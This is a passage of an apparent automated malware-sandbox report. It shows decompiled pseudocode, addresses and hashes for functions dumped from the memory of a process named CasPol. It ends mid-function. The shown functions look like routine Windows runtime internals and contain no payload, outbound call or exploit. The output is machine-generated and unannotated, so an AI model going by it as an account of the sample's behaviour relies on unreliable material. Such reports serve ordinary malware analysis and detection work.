                                                                  0x014537a3
                                                                  0x014537a3
                                                                  0x014537a5
                                                                  0x014537a7
                                                                  0x014537ad
                                                                  0x014537b0
                                                                  0x014537b2
                                                                  0x014537bc
                                                                  0x014537c2
                                                                  0x014537c2
                                                                  0x014537b2
                                                                  0x013f9187
                                                                  0x013f9187
                                                                  0x013f918a
                                                                  0x013f918d
                                                                  0x013f918f
                                                                  0x013f9192
                                                                  0x013f9195
                                                                  0x00000000
                                                                  0x013f9195
                                                                  0x00000000
                                                                  0x0145376a
                                                                  0x0145376a
                                                                  0x0145376a
                                                                  0x0145376c
                                                                  0x0145376c
                                                                  0x0145376f
                                                                  0x01453775
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01453777
                                                                  0x01453779
                                                                  0x01453782
                                                                  0x01453787
                                                                  0x01453789
                                                                  0x01453790
                                                                  0x01453790
                                                                  0x0145378b
                                                                  0x0145378b
                                                                  0x0145378b
                                                                  0x01453792
                                                                  0x01453795
                                                                  0x00000000
                                                                  0x01453795
                                                                  0x00000000
                                                                  0x01453779
                                                                  0x01453798
                                                                  0x00000000
                                                                  0x01453798
                                                                  0x00000000
                                                                  0x01453768
                                                                  0x0145379b
                                                                  0x0145379b
                                                                  0x01453751
                                                                  0x01453749
                                                                  0x00000000
                                                                  0x01453740
                                                                  0x013f91a0
                                                                  0x013f91a3
                                                                  0x013f91a9
                                                                  0x013f91b0
                                                                  0x00000000
                                                                  0x013f91b0
                                                                  0x013f9187
                                                                  0x013f91b4
                                                                  0x013f91b4
                                                                  0x013f91bb
                                                                  0x013f91c0
                                                                  0x013f91c5
                                                                  0x013f91c7
                                                                  0x014537da
                                                                  0x013f91cd
                                                                  0x013f91cd
                                                                  0x013f91cd
                                                                  0x013f91d2
                                                                  0x013f91d5
                                                                  0x013f9239
                                                                  0x013f9239
                                                                  0x013f91d7
                                                                  0x013f91db
                                                                  0x013f91e1
                                                                  0x013f91e7
                                                                  0x013f91fd
                                                                  0x013f9203
                                                                  0x013f921e
                                                                  0x013f9223
                                                                  0x00000000
                                                                  0x013f9205
                                                                  0x013f9205
                                                                  0x013f9208
                                                                  0x013f920c
                                                                  0x013f9214
                                                                  0x013f9214
                                                                  0x013f920c
                                                                  0x013f91e9
                                                                  0x013f91e9
                                                                  0x013f91ee
                                                                  0x013f91f3
                                                                  0x013f91f3
                                                                  0x013f91f3
                                                                  0x013f91e7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x013f9134
                                                                  0x013f9125
                                                                  0x013f911d
                                                                  0x013f914e
                                                                  0x013f90d1
                                                                  0x013f90d1
                                                                  0x013f90d3
                                                                  0x013f90d6
                                                                  0x013f90d8
                                                                  0x00000000
                                                                  0x013f90d8
                                                                  0x013f90cf

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 332eb88f82ac98d39f97371df68784deaca3d3c6fe830ea9f3a8bb400f23915e
                                                                  • Instruction ID: 0992b4d9b5c294baa1c1edab35b75c4d35946c66a3031e531126d66d9986f1da
                                                                  • Opcode Fuzzy Hash: 332eb88f82ac98d39f97371df68784deaca3d3c6fe830ea9f3a8bb400f23915e
                                                                  • Instruction Fuzzy Hash: F801AF726016068FD3269F19D840B16BBE9EB8532DF25407BE6058F7A6C774DC41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014C4015 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 86%
                                                                  			E014C4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01412280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01412280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x14e86ac);
					E013FF900(0x14e86d4, _t28);
					L0140FFB0(0x14e86ac, _t28, 0x14e86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					L0140FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                  0x014c401a
                                                                  0x014c401e
                                                                  0x014c4023
                                                                  0x014c4028
                                                                  0x014c4029
                                                                  0x014c402b
                                                                  0x014c402f
                                                                  0x014c4043
                                                                  0x014c4046
                                                                  0x014c4051
                                                                  0x014c4057
                                                                  0x014c405f
                                                                  0x014c4062
                                                                  0x014c4067
                                                                  0x014c406f
                                                                  0x014c407c
                                                                  0x014c407c
                                                                  0x014c408c
                                                                  0x014c408c
                                                                  0x014c4097

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 31f78e30b8420fa6cb1be0074a0e96e85624b61482d1287722ad995c8b90caa1
                                                                  • Instruction ID: c62d84d459f779b606421f94a01f013350c1d6f7d1f742a7b0d0c6686b0f1e5d
                                                                  • Opcode Fuzzy Hash: 31f78e30b8420fa6cb1be0074a0e96e85624b61482d1287722ad995c8b90caa1
                                                                  • Instruction Fuzzy Hash: 700184722415467FD651AB7ACE84E57B7ACFB65660B00022FB518C3A71CB34EC11CAE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014B138A Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 79%
                                                                  			E014B138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x14ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0143FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01417D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L0143B640(E01439AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                                                                  0x014b138a
                                                                  0x014b138a
                                                                  0x014b1399
                                                                  0x014b13a3
                                                                  0x014b13a8
                                                                  0x014b13aa
                                                                  0x014b13b5
                                                                  0x014b13bb
                                                                  0x014b13c3
                                                                  0x014b13c6
                                                                  0x014b13c9
                                                                  0x014b13d4
                                                                  0x014b13e6
                                                                  0x014b13d6
                                                                  0x014b13df
                                                                  0x014b13df
                                                                  0x014b13f1
                                                                  0x014b13f2
                                                                  0x014b13f4
                                                                  0x014b140e

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 089d449b1abee8507104b68f3b380e95b9dbab901a0b99776e912d7d4b683d31
                                                                  • Instruction ID: 8f5e66fc0dc61827a0dcd295cf7788c609a0b55a8dd3b789340d5de2be59cb61
                                                                  • Opcode Fuzzy Hash: 089d449b1abee8507104b68f3b380e95b9dbab901a0b99776e912d7d4b683d31
                                                                  • Instruction Fuzzy Hash: 70019271E01209AFDB10EFA9D881FAEBBB8EF54700F00405BB904EB390E6749A01C791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013F58EC Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 91%
                                                                  			E013F58EC(void* __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				void* _t17;
				void* _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x14ed360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x13d5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E013F5943() != 0 &&  *0x14e5320 > 5) {
					E01477B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01477B5E( &_v28, _t28);
					_t11 = E01477B9C(0x14e5320, 0x13dbf15,  &_v28, _t22, 4,  &_v76);
				}
				return L0143B640(_t11, _t17, _v8 ^ _t29, 0x13dbf15, _t27, _t28);
			}















                                                                  0x013f58fb
                                                                  0x013f58fe
                                                                  0x013f5906
                                                                  0x013f590a
                                                                  0x013f593c
                                                                  0x013f593c
                                                                  0x013f590c
                                                                  0x013f590c
                                                                  0x013f5911
                                                                  0x00000000
                                                                  0x013f5913
                                                                  0x013f5913
                                                                  0x013f5913
                                                                  0x013f5911
                                                                  0x013f591d
                                                                  0x01451035
                                                                  0x0145103c
                                                                  0x0145103f
                                                                  0x01451056
                                                                  0x01451056
                                                                  0x013f593b

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba29bf430f2c9bfdfbc075896fe53e2d4bbdf96e8e67dc7015f630d2cd9b6577
                                                                  • Instruction ID: b372864e35a578664134e5e48bcad97d1c7375836e089b7a3a0188dc5ab8ced0
                                                                  • Opcode Fuzzy Hash: ba29bf430f2c9bfdfbc075896fe53e2d4bbdf96e8e67dc7015f630d2cd9b6577
                                                                  • Instruction Fuzzy Hash: 4901F236A00109DBCB18EA69D804ABF7BACEF91128F94006E9A05AB664DE30DD05C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014C1074 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 54%
                                                                  			E014C1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v11;
				unsigned int _v12;
				intOrPtr _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L014C165E(__ebx, 0x14e8ae4, (__edx -  *0x14e8b04 >> 0x14) + (__edx -  *0x14e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x14e8b04 >> 0x14) + (__edx -  *0x14e8b04 >> 0x14));
				}
				_push( *((intOrPtr*)(_t35 + 0x38)));
				_push( *((intOrPtr*)(_t35 + 0x34)));
				_push(0x8000);
				L014BAFDE( &_v8,  &_v12);
				if(E01417D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = L014AFE3F(_t22, _t35, _v11, _v15);
				}
				return _t16;
			}












                                                                  0x014c1074
                                                                  0x014c1080
                                                                  0x014c1082
                                                                  0x014c108a
                                                                  0x014c108f
                                                                  0x014c1093
                                                                  0x014c10a8
                                                                  0x014c10ab
                                                                  0x014c10ab
                                                                  0x014c10b0
                                                                  0x014c10b7
                                                                  0x014c10be
                                                                  0x014c10c3
                                                                  0x014c10cf
                                                                  0x014c10e1
                                                                  0x014c10d1
                                                                  0x014c10da
                                                                  0x014c10da
                                                                  0x014c10e9
                                                                  0x014c10f5
                                                                  0x014c10f5
                                                                  0x014c10fe

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7de40ab67bb0db778022ae913d7b44f5dc32a7659e702ba93bc8234b45ce7643
                                                                  • Instruction ID: c090e20c3ace823833fe6b3923221d31d1937f6a8834093fa2c4b809f8edcb4d
                                                                  • Opcode Fuzzy Hash: 7de40ab67bb0db778022ae913d7b44f5dc32a7659e702ba93bc8234b45ce7643
                                                                  • Instruction Fuzzy Hash: 01012876604742DFC750DB2AC944B5B7BE5ABA4A10F04861EF985837B2DE30D841CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0140B02A Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0140B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01417D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01477016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                  0x0140b037
                                                                  0x0140b039
                                                                  0x0140b03b
                                                                  0x0140b040
                                                                  0x0145a60e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0145a61d
                                                                  0x0140b04b
                                                                  0x0140b04e
                                                                  0x0145a627
                                                                  0x0145a634
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0145a641
                                                                  0x0145a653
                                                                  0x0145a643
                                                                  0x0145a64c
                                                                  0x0145a64c
                                                                  0x0145a65b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0145a66c
                                                                  0x0140b057
                                                                  0x0140b057
                                                                  0x0140b057
                                                                  0x0140b046
                                                                  0x0140b046
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                  • Instruction ID: c472c793dd84bd80caba05f16fcc72c387ab534d298ad145bc9ba9503a889e81
                                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                  • Instruction Fuzzy Hash: 59015EB62005849FE323D71EC948F677BD8EB95654F0940A2AA19CB7B2D638DC41C625
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014C8A62 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E014C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x14ed360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01417D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L0143B640(E01439AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                                                                  0x014c8a62
                                                                  0x014c8a71
                                                                  0x014c8a79
                                                                  0x014c8a82
                                                                  0x014c8a85
                                                                  0x014c8a89
                                                                  0x014c8a8c
                                                                  0x014c8a8f
                                                                  0x014c8a92
                                                                  0x014c8a95
                                                                  0x014c8a9f
                                                                  0x014c8ab1
                                                                  0x014c8aa1
                                                                  0x014c8aaa
                                                                  0x014c8aaa
                                                                  0x014c8abc
                                                                  0x014c8abd
                                                                  0x014c8abf
                                                                  0x014c8ada

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac7e38129749cce71bbc48f2f1cb6f0a1750ca83e53311b2252f9f1f3771f6c3
                                                                  • Instruction ID: 335f5daf677d5679d70f9e9a39eef429394cd5070452db7b07a6495afe3c946c
                                                                  • Opcode Fuzzy Hash: ac7e38129749cce71bbc48f2f1cb6f0a1750ca83e53311b2252f9f1f3771f6c3
                                                                  • Instruction Fuzzy Hash: 67012C75A0021DAFCB00DFA9D9419AEBBB8EF98710F10405BF904E7361D634A901CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FDB60 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E013FDB60(intOrPtr* __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *__ecx != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E013FDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = L013FE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L013FE8B0(__ecx, _t14, 0xfff);
							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                  0x013fdb64
                                                                  0x013fdb66
                                                                  0x013fdb6b
                                                                  0x013fdbaa
                                                                  0x013fdb71
                                                                  0x013fdb76
                                                                  0x013fdb7a
                                                                  0x013fdba3
                                                                  0x013fdb7c
                                                                  0x013fdb87
                                                                  0x013fdb8b
                                                                  0x01454fa1
                                                                  0x01454fb3
                                                                  0x01454fb8
                                                                  0x013fdb91
                                                                  0x013fdb96
                                                                  0x013fdb98
                                                                  0x013fdb98
                                                                  0x013fdb8b
                                                                  0x013fdb7a
                                                                  0x013fdb9d
                                                                  0x013fdba2

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                  • Instruction ID: 74ad18026e6e7f24e3c1cd6ebe1d05fea59e591f2b89213a2f0e54862fd0a910
                                                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                  • Instruction Fuzzy Hash: BEF09C3324152B9BD7326EDD4888F57BA999FD1A68F16003EF7059B754C9708C0297D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FB1E1 Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E013FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01417D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01417D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01477016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                  0x013fb1e8
                                                                  0x013fb1ea
                                                                  0x013fb1f3
                                                                  0x01454a17
                                                                  0x013fb1f9
                                                                  0x013fb1f9
                                                                  0x013fb1f9
                                                                  0x013fb201
                                                                  0x01454a21
                                                                  0x01454a2e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01454a3b
                                                                  0x01454a4d
                                                                  0x01454a3d
                                                                  0x01454a46
                                                                  0x01454a46
                                                                  0x01454a55
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x013fb20a
                                                                  0x013fb20a
                                                                  0x013fb20a
                                                                  0x013fb20a

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                  • Instruction ID: 29506f98438203c0aae5c5892b4fbed2eb251c471212faecb08dc4d654d9dccd
                                                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                  • Instruction Fuzzy Hash: 0001F936200584ABD322975DC804F5ABB98EF51794F0C0066FE148B7B7E674CC40C314
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014B131B Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 73%
                                                                  			E014B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x14ed360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01417D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				return L0143B640(E01439AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}















                                                                  0x014b131b
                                                                  0x014b132a
                                                                  0x014b1330
                                                                  0x014b1336
                                                                  0x014b133e
                                                                  0x014b1341
                                                                  0x014b1344
                                                                  0x014b134f
                                                                  0x014b1361
                                                                  0x014b1351
                                                                  0x014b135a
                                                                  0x014b135a
                                                                  0x014b136c
                                                                  0x014b136d
                                                                  0x014b136f
                                                                  0x014b1387

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b2f138c934d72fbafaed7775074b01c41afc6bbc124c9bc971df86bfc33662f
                                                                  • Instruction ID: 4d17702d72b356934a55ceb6b2b5b32ac8943935f4c7b86e4b3cdff10bc0d9c1
                                                                  • Opcode Fuzzy Hash: 4b2f138c934d72fbafaed7775074b01c41afc6bbc124c9bc971df86bfc33662f
                                                                  • Instruction Fuzzy Hash: CB018C71E0120DAFCB00EFA9D545AAEB7F4FF58700F00405AB805EB3A1E6309A00CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01426B90 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E01426B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}









                                                                  0x01426b96
                                                                  0x01426b99
                                                                  0x01426b9d
                                                                  0x01426be9
                                                                  0x01426beb
                                                                  0x01426beb
                                                                  0x01426bb3
                                                                  0x01426bb3
                                                                  0x01426bb5
                                                                  0x01426bba
                                                                  0x01426bc1
                                                                  0x01426bc3
                                                                  0x01426bc5
                                                                  0x01426be0
                                                                  0x01426be0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01426bc7
                                                                  0x01426bc7
                                                                  0x01426bd0
                                                                  0x01426bd5
                                                                  0x01426bd6
                                                                  0x01426bd9
                                                                  0x00000000
                                                                  0x01426bc7
                                                                  0x01426ba5
                                                                  0x01426bac
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01426bae
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                  • Instruction ID: e991c95438f1d694ac524edf5cf1fe0ac5e2b08dfb5fd213f776ebbf8c07272d
                                                                  • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                  • Instruction Fuzzy Hash: 8EF04975A00228DFDB18CE48C690BADBBB5EB44310F6540A9E906DB760D6399E80DB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014B2073 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 89%
                                                                  			E014B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = L014AFD22(__ecx);
				_t19 =  *0x14e849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x14e8748; // 0x0
					if(__eflags <= 0) {
						L014B1C06();
